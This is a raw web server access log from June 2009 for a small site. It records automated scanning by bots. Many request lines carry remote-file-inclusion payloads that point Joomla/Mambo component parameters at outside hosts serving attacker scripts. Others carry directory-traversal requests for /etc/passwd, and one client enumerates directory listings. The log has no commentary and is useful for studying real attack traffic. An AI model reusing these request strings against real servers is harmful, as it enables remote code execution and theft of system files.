218.232.105.116 - - [29/Jun/2009:04:35:57 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:37:59 -0700] "GET /logs/access.log%20%20//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:37:59 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:37:59 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:38:00 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:38:00 -0700] "GET /logs/access.log%20%20//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:38:00 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:38:44 -0700] "GET /logs/access_090420.log%20%20//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:38:46 -0700] "GET /logs/access_090420.log%20%20//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:23 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:23 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:23 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:27 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:27 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:04:40:27 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:01 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:01 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:01 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:12 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:12 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.232.105.116 - - [29/Jun/2009:04:42:12 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:35 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:35 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:38 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:54 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:42:55 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:26 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:28 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:28 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:43:28 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:44:24 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:44:24 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:44:24 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:39 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:39 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:46 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:44:46 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:45:46 -0700] "GET /phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:45:46 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:45:46 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:46:20 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:46:20 -0700] "GET /logs/access_090420.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.189.18.73 - - [29/Jun/2009:04:46:27 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:46:58 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:46:58 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:46:58 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
125.248.150.52 - - [29/Jun/2009:04:47:39 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:47:47 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:47:47 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:04:47:47 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:04:50:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:11 -0700] "GET /logs/access_090420.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:11 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:11 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:17 -0700] "GET /phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:17 -0700] "GET /logs/access_090420.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:17 -0700] "GET /logs//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:33 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.203.180.144 - - [29/Jun/2009:04:50:38 -0700] "GET /logs/access.log//phphtml.php//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:04:50:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:04:51:05 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:04:51:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:27 -0700] "GET / HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:29 -0700] "GET /?N=D HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:29 -0700] "GET /?M=A HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:30 -0700] "GET /?S=A HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:31 -0700] "GET /?D=A HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:31 -0700] "GET /logs/ HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:34 -0700] "GET /sitebuilder/ HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:37 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:38 -0700] "GET /?N=A HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:38 -0700] "GET /?M=D HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:38 -0700] "GET /?S=D HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:41 -0700] "GET /?D=D HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:43 -0700] "GET /logs/?N=D HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:43 -0700] "GET /logs/?M=A HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:45 -0700] "GET /logs/?S=A HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:47 -0700] "GET /logs/?D=A HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:51 -0700] "GET /sitebuilder/?N=D HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:51 -0700] "GET /sitebuilder/?M=A HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:52 -0700] "GET /sitebuilder/?S=A HTTP/1.0" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:52 -0700] "GET /sitebuilder/?D=A HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:52 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:52 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:54 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:56 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:56 -0700] "GET /logs/?N=A HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:59 -0700] "GET /logs/?M=D HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:52:59 -0700] "GET /logs/?S=D HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:01 -0700] "GET /logs/?D=D HTTP/1.1" 200 3083 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:03 -0700] "GET /sitebuilder/?N=A HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:03 -0700] "GET /sitebuilder/?M=D HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:03 -0700] "GET /sitebuilder/?S=D HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:05 -0700] "GET /sitebuilder/?D=D HTTP/1.1" 200 536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:05 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:06 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:06 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
174.133.177.66 - - [29/Jun/2009:04:53:09 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:29 -0700] "GET /logs/access_090420.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:29 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:29 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:38 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:38 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:56:38 -0700] "GET /logs/access_090420.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:56:44 -0700] "GET /logs/access_090510.log/?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:56:44 -0700] "GET /?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:56:44 -0700] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 3083 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:57:02 -0700] "GET /logs/access_090510.log/?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:57:02 -0700] "GET /?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.246.98.115 - - [29/Jun/2009:04:57:02 -0700] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 3083 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:57:06 -0700] "GET /logs/access_090420.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:57:06 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:57:06 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:57:12 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
